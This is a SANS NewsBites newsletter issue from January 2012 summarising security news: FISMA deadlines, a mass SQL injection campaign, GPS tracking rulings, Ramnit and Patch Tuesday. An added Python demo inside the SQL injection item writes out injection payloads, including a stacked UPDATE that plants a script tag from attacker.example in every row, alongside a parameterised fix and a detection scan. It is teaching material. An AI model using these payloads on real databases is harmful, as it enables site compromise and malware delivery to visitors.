SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.
Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.
Volume XIV - Issue #2
January 06, 2012
TOP OF THE NEWS
Federal Agencies Don't Expect to Meet FISMA Continuous Monitoring Deadline
SQL Injection Attack Spreads
Federal Judge Says No Warrant Needed for GPS Tracking
THE REST OF THE WEEK'S NEWS
Pastebin Recovering from DDoS Attack
Federal Prosecutors Seek Order to Force Colorado Woman to Decrypt Computer
Apple Tackling Pirated Apps
Malware Infection Results in Retrial for Man Convicted of Murder
Ramnit Worm Stealing Facebook Login Credentials
Israeli Credit Card Data Stolen, Posted to Internet
Microsoft Sues Company for Allegedly Selling Counterfeit Windows Recovery CDs
First Microsoft Patch Tuesday of 2012 to Address Eight Flaws
Hands-On Learning Serves Information Security Education Well
********************** SPONSORED BY Palo Alto Networks ******************
Palo Alto Networks Recognized as a Leader in the Gartner Magic Quadrant for Enterprise Network Firewalls. According to Gartner, vendors in the leaders quadrant "lead the market in offering new safeguarding features, providing expert capability, rather than treating the firewall as a commodity, and having a good track record of avoiding vulnerabilities in their security products."
--SANS Security East 2012, New Orleans, LA January 17-26, 2012 11 courses. Bonus evening presentations include Advanced VoIP PenTesting: Current Threats and Methods; and Helping Small Businesses with Security.
--SANS North American SCADA 2012, Lake Buena Vista, FL January 21-29, 2012 Gain the most current information regarding SCADA and Control System threats and learn how to best prepare to defend against them. Hear what works and what doesn't from peer organizations. Network with top individuals in the field of SCADA security. Return from the summit with solutions that you can immediately put to use in your organization. Pre-Summit courses: January 21-25, 2012 Summit: January 26-27, 2012 Post-Summit Courses: January 28-29, 2012
--SANS Monterey 2012, Monterey, CA January 30-February 4, 2012 6 courses. Bonus evening presentations include Who Do You Trust? SSL and TLS Under Attack; and IOS Programming Demo.
--SANS Phoenix 2012, Phoenix, AZ February 13-18, 2012 7 courses. Bonus evening presentations include Desktop Betrayal: Exploiting Clients Through the Features They Demand; and Windows Exploratory Surgery with Process Hacker.
--SANS Secure Singapore 2012, Singapore, Singapore March 5-17, 2012 5 courses. Bonus evening presentations include Introduction to Windows Memory Analysis; and Why Our Defenses are Failing Us: One Click is All It Takes ...
--SANS 2012, Orlando, FL March 23-30, 2012 42 courses. Bonus evening presentations include Exploiting Vulnerabilities: 60 Minutes from Discovery to Exploit; Evolving Threats; and Harbinger of Evil: The Forensic Art of Finding Malware.
--Looking for training in your own community?
Save on On-Demand training (30 full courses) - See samples at
Plus Atlanta, Bangalore, San Francisco, Stuttgart, and Nashville, all in the next 90 days. For a list of all upcoming events, on-line and live: http://www.sans.org/index.php ************************************************************************
TOP OF THE NEWS
Federal Agencies Don't Expect to Meet FISMA Continuous Monitoring Deadline (January 3, 2012) A survey of US federal agencies found that fewer than half expect to comply with the Federal Information Security Management Act (FISMA) continuous monitoring requirements by the September 2012 deadline. Respondents believe the move will improve security overall, but making the changes needed to meet the requirements is proving difficult: agencies must pull together information from many disparate systems to produce the required data set, and many lack the overview of their own IT environments needed to deploy the technology.
[Editor's Note (Pescatore): Continuous monitoring and reporting (and other changes in 800-53 rev 3) was an enormous unfunded mandate for most government agencies. A few agencies were able to increase staff and funds, but most could not - or at least did not. FY 2012 budgets are in even worse turmoil - rev 3 deficiencies overall will likely carry well into FY2013.
(Paller): It's never been about the money. Ever since both Senate and House hearings and White House leadership have called upon agencies to replace C&A reporting with continuous monitoring and mitigation, two barriers have consistently blocked broad adoption: (1) the contractors who are earning $350 million every year writing out-of-date and unread security reports for certification and accreditation updates, and who don't want to give up that money even though they know they are wasting federal funds, and (2) the IGs who give the contractors cover because they don't know how to, and have not tried to measure continuous monitoring and mitigation systems. A phone call I had with the IG from a major agency this week says that the second barrier is falling across several agencies. There is more than enough money wasted in C&A report writing to fully fund continuous monitoring and mitigation. ]
SQL Injection Attack Spreads (January 4 & 5, 2012) A SQL injection attack appears to have infected more than 1 million URLs. Some say the reported number may be inflated, because search-engine counts can include pages that merely discuss the attack; even so, the number of infected URLs was significantly smaller in early December 2011, so the campaign is clearly growing. The malware is called lilupophilupop. The attack appears to be partly automated and partly manual. The .NL domain (the Netherlands) has the greatest number of infections. Internet Storm Center:
[Editor's Note (Murray): Unchecked Inputs continues to be the most wide-spread vulnerability having now surpassed default passwords. SQL-injection attacks are at least among the top three in frequency and success. I wish checking inputs was easy; it isn't. However, using the OWASP Enterprise Security API Library is easy. ]
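The item above describes the two halves of a mass SQL injection campaign: one unchecked input that reaches the query text, and a payload that rewrites every text column it can reach so that each page served from the database carries an attacker's script tag. The following is an added example, not code from the NewsBites item, the ISC diary or the OWASP ESAPI library Murray recommends; it uses plain parameter binding rather than ESAPI, and the table schema, sample rows and the attacker.example host are constructed for the demo. Because Python's sqlite3 refuses stacked statements in execute(), the vulnerable function splits on ';' to emulate database drivers that do run them; that split is demo scaffolding and is labelled as such in the code.

```python
import sqlite3

# Constructed sample rows for the demo (not data from the page or the ISC diary).
SEED_ROWS = [
    (1, "Welcome", "Hello, world"),
    (2, "About us", "We sell widgets"),
]

# Hypothetical attacker host; the real campaign pointed at a different domain.
INJECTED_TAG = '<script src="http://attacker.example/sl.js"></script>'

# Payload 1: breaks out of the string literal and makes the WHERE clause always true.
DUMP_PAYLOAD = "' OR '1'='1"

# Payload 2: terminates the SELECT and appends an UPDATE that tags every row's body,
# the same write-everywhere shape the mass injection campaign used.
MASS_INJECT_PAYLOAD = (
    "'; UPDATE articles SET body = body || '" + INJECTED_TAG + "' WHERE '1'='1"
)


def make_db():
    """In-memory database with one table of articles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SEED_ROWS)
    return conn


def search_vulnerable(conn, title):
    """The bug: untrusted input is spliced into the SQL text.

    sqlite3's execute() refuses stacked statements, so the string is split on ';'
    and each piece is run in turn to emulate drivers (e.g. for MS SQL Server) that
    do run them. The split is demo scaffolding, not how a real driver behaves.
    Returns the rows of the last statement that produced any.
    """
    sql = f"SELECT id, title FROM articles WHERE title = '{title}'"
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows = conn.execute(stmt).fetchall()
    return rows


def search_safe(conn, title):
    """The fix: bind the value as a parameter; it can never become SQL syntax."""
    return conn.execute(
        "SELECT id, title FROM articles WHERE title = ?", (title,)
    ).fetchall()


def find_injected_rows(conn, marker="%<script%"):
    """Post-compromise check: list (table, column, rowid) for every TEXT column
    whose content carries a script tag. Table and column names come from the
    schema catalogue, not from users, so quoting them into the query is safe."""
    hits = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'"
    ).fetchall()
    for (table,) in tables:
        for _cid, col, ctype, *_ in conn.execute(f"PRAGMA table_info('{table}')"):
            if ctype.upper() != "TEXT":
                continue
            query = f'SELECT rowid FROM "{table}" WHERE "{col}" LIKE ?'
            hits.extend((table, col, rowid) for (rowid,) in conn.execute(query, (marker,)))
    return sorted(hits)


if __name__ == "__main__":
    conn = make_db()
    print("dump via vulnerable query:", search_vulnerable(conn, DUMP_PAYLOAD))
    print("same input, parameterised:", search_safe(conn, DUMP_PAYLOAD))
    search_vulnerable(conn, MASS_INJECT_PAYLOAD)
    print("rows tagged after mass injection:", find_injected_rows(conn))
```

Two points worth noticing when running it: the same DUMP_PAYLOAD that returns every row through the concatenated query returns nothing through the bound one, because the driver sends the quote characters as data; and the scan in find_injected_rows is the kind of check a site owner should run against every text column after an incident like this, since the injected tag lives in the database, not in the page templates.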
Federal Judge Says No Warrant Needed for GPS Tracking (January 3, 2012) A US federal judge in Missouri has ruled that the FBI did not need a warrant to surreptitiously affix a GPS device to a suspect's automobile and track his location for two months. The defendant, Fred Robinson, was accused of falsifying his time sheets while employed by the city of St. Louis. Magistrate David Noce wrote in his ruling that Robinson had no reasonable expectation of privacy; the GPS device revealed the location of the suspect's vehicle, but nothing more. "Under these circumstances [set forth in the ruling], installation of the GPS tracker device was not a search within the meaning of the Fourth Amendment." The US Supreme Court is expected to rule on an unrelated case regarding the same issue in the next few months.
[Editor's Note (Pescatore): I've lost track of the precedent cases from back in the day, but with the old vehicle tracking systems used in the pre-GPS 1980s we were able to attach them and monitor them without a warrant - as long as we did not use the vehicle's power or anything else existing in the vehicle. I'm sure this distinction will come up soon as so many cars are coming with GPS built into them.
(Liston): I don't see that there is much difference between slapping a GPS tracker on a car and simply assigning a beat-cop to "tail" a suspect. Actually, it seems *less* invasive, because if you get out of your car and *walk* somewhere, the GPS doesn't know it. ]
************************** SPONSORED LINK ****************************
1) Take the SANS 8th Annual Log and Event Management Survey Be a part of this industry leading survey and be entered to WIN a $250 American Express Card. http://www.sans.org/info/96454
2) What devices are accessing what resources and by whom? Take the SANS first annual mobility survey and be entered to win a $250 American Express Card Giveaway when results are announced in late March at SANS 2012!
Follow this link to the survey: http://www.sans.org/info/96459
THE REST OF THE WEEK'S NEWS
Pastebin Recovering from DDoS Attack (January 4, 2012) Pastebin.com is back online after a distributed denial-of-service (DDoS) attack hit the text-sharing service earlier this week. The site has been used by the loosely organized hacking collective known as Anonymous to post information stolen in its exploits and to announce plans for future attacks. There is, however, no evidence of a connection between the attack and Anonymous's use of the site.
[Editor's Note (Pescatore): Global warming has tended to cause more extremes in weather resulting in more power outages, pointing out the wisdom of having backup power for business critical services. Now, I tend to doubt that the growth in DDoS attacks can really be blamed on global climate change, but the growth is there - pointing out the need for making sure Internet connectivity is as reliable as electrical power. ]
Federal Prosecutors Seek Order to Force Colorado Woman to Decrypt Computer (January 4, 2012) Federal prosecutors in Denver, Colorado are seeking a court order that would force Ramona Fricosu to enter the password to decrypt her laptop computer. They believe the machine contains evidence that would help convict Fricosu and her former husband in a bank fraud case. The pair was allegedly involved in a complex mortgage fraud scheme that stole more than US $900,000 from banks in the Colorado Springs area. Prosecutors say that Fricosu would not have to divulge her password: she could enter it without its being recorded, as long as investigators end up with access to the decrypted contents of the computer.
[Editor's Note (Murray): The court is entitled to the best evidence. It cannot force one to make a record. However, once a record is made, one may not conceal it from the court. The intent of the 5th amendment was to prevent "witch trials," the conviction of one on only their own coerced testimony. The written or electronic record, on the other hand, says what it says. ]
Apple Tackling Pirated Apps (January 4, 2012) Apple is taking steps to thwart the availability of pirated applications for the company's devices. By sending Digital Millennium Copyright Act (DMCA) takedown notices to Apptrackr, Apple hopes to cut off access to the pirated apps. In response, Apptrackr has moved its server outside of the US and has deployed technology that does not use direct links to the applications. The developer of Apptrackr claims his site is designed to allow users to test apps before they buy them, but admits that it is often used by people who never intend to purchase the apps.
[Editor's Note (Murray): Apple is defending the right of everyman to at least one orderly computing environment. Steve Jobs, if he were still with us, might say, "If you want pirated software, if you want porn, if you want leakage from and contamination of your devices, get an Android." ]
Malware Infection Results in Retrial for Man Convicted of Murder (January 1 & 5, 2012) A Florida man who was convicted of second degree murder will get a new trial because a computer virus destroyed the transcripts of the court proceedings. Court stenographers normally make both paper and electronic records of proceedings, but in this case the stenographer did not bring enough paper and recorded the proceedings only digitally. The digital records were then transferred to her personal computer and deleted from the stenograph. Her PC then became infected with a computer virus, and the court records were lost. Randy Chaviano's legal team filed an appeal after he was given a life sentence in July 2009; because the transcripts of the trial were incomplete, the Third District Court of Appeals ordered that Chaviano be granted a new trial. The stenographer involved has since been fired.
Ramnit Worm Stealing Facebook Login Credentials (January 5, 2012) A worm known as Ramnit is stealing Facebook login credentials. The malware infects Windows executable, Microsoft Office, and HTML files and can be used as a backdoor, allowing attackers to take further action on compromised machines. A Ramnit command and control server holding login credentials for 45,000 Facebook accounts has been found. Most of the affected users appear to be in the UK and France.
Israeli Credit Card Data Stolen, Posted to Internet (January 3 & 4, 2012) A group in Saudi Arabia, believed to have ties to the Anonymous hacking collective, has stolen Israeli credit card account data and posted it to the Internet. The group claimed to have compromised 400,000 card accounts, but an Israeli credit card company said that most of the data were invalid or incorrect and that the number of exposed accounts was much lower. Israeli banks have frozen the compromised accounts, which are believed to number about 14,000. Most of the stolen data appear to have been taken from a sports website, One.co.il.
Microsoft Sues Company for Allegedly Selling Counterfeit Windows Recovery CDs (January 4, 2012) Microsoft is suing UK retailer Comet for allegedly selling counterfeit copies of Windows Vista and Windows XP recovery disks. Comet has countered with a statement saying that it was acting in its customers' best interests because users of Microsoft products were "adversely affected by the [software company's] decision to stop supplying recovery disks with each new Microsoft operating system based computer." Microsoft responded that the PCs' hard drives already contained recovery software and that Comet sold for GBP 14.99 (US $23.24) disks that Microsoft would have provided at a much lower cost or even at no cost at all. Comet has about 250 stores in the UK.
First Microsoft Patch Tuesday of 2012 to Address Eight Flaws (January 5, 2012) On Tuesday, January 10, 2012, Microsoft plans to issue seven security bulletins that address a total of eight flaws. The vulnerabilities affect Microsoft Windows and Microsoft Developer Tools and Software. Just one of the bulletins carries a maximum severity rating of critical; the other six are rated important. All currently supported versions of Windows are affected by flaws fixed in the January 2012 update. One of the bulletins lists its impact as "security feature bypass," a term Microsoft has not used in this context before. Microsoft declined to say whether it will be issuing a fix for the SSL/TLS vulnerability; the company had planned to fix that flaw in December 2011, but pulled the patch at the last minute because of compatibility issues with SAP software. Internet Storm Center:
Hands-On Learning Serves Information Security Education Well (January 3, 2012) Although jobs in information security are more stable than those in most other sectors, fewer students are pursuing STEM (science, technology, engineering, and math) majors in college. Some of the reluctance may stem from the assumption that information security jobs will be outsourced or from a weak foundation at the high school level; in addition, colleges often neglect to offer STEM students valuable research opportunities. Many colleges lump security in with general computer science; it is rare for security to be taught as a specialty at the college level, though that is beginning to change. Alex Levinson, now a security software engineer at Zynga, spoke to the value of hands-on experience and learning, noting that "doing simulation, competition, and application of skill in a live environment is a really good indicator of where their skill set is at, where their talent lies." Levinson participated in the National Collegiate Cyber Defense Competition and did well enough to earn a spot in the US Cyber Challenge, where he and his team took first place. But even after people have acquired the skills needed to be effective cyber security professionals, placement can be difficult because companies have trouble articulating what they need. An initiative led by the US Office of Personnel Management aims to develop a taxonomy of cyber security roles to help address that problem.
The Editorial Board of SANS NewsBites
John Pescatore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.
Stephen Northcutt founded the GIAC certification and is President of STI, The Premier Skills-Based Cyber Security Graduate School, www.sans.edu.
Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.
Ed Skoudis is co-founder of InGuardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.
William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.
Rob Lee is the curriculum lead instructor for the SANS Institute's computer forensic courses (computer-forensics.sans.org) and a Director at the incident response company Mandiant.
Rohit Dhamankar is a security professional currently involved in independent security research.
Tom Liston is a Senior Security Consultant and Malware Analyst for InGuardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.
Ron Dick directed the National Infrastructure Protection Center (NIPC) at the FBI and served as President of the InfraGard National Members Alliance - with more than 22,000 members.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.
David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.
Alan Paller is director of research at the SANS Institute.
Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.
Clint Kreitner is the founding President and CEO of The Center for Internet Security.
Brian Honan is an independent security consultant based in Dublin, Ireland.
David Turley is SANS infrastructure manager and serves as production manager and final editor on SANS NewsBites.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/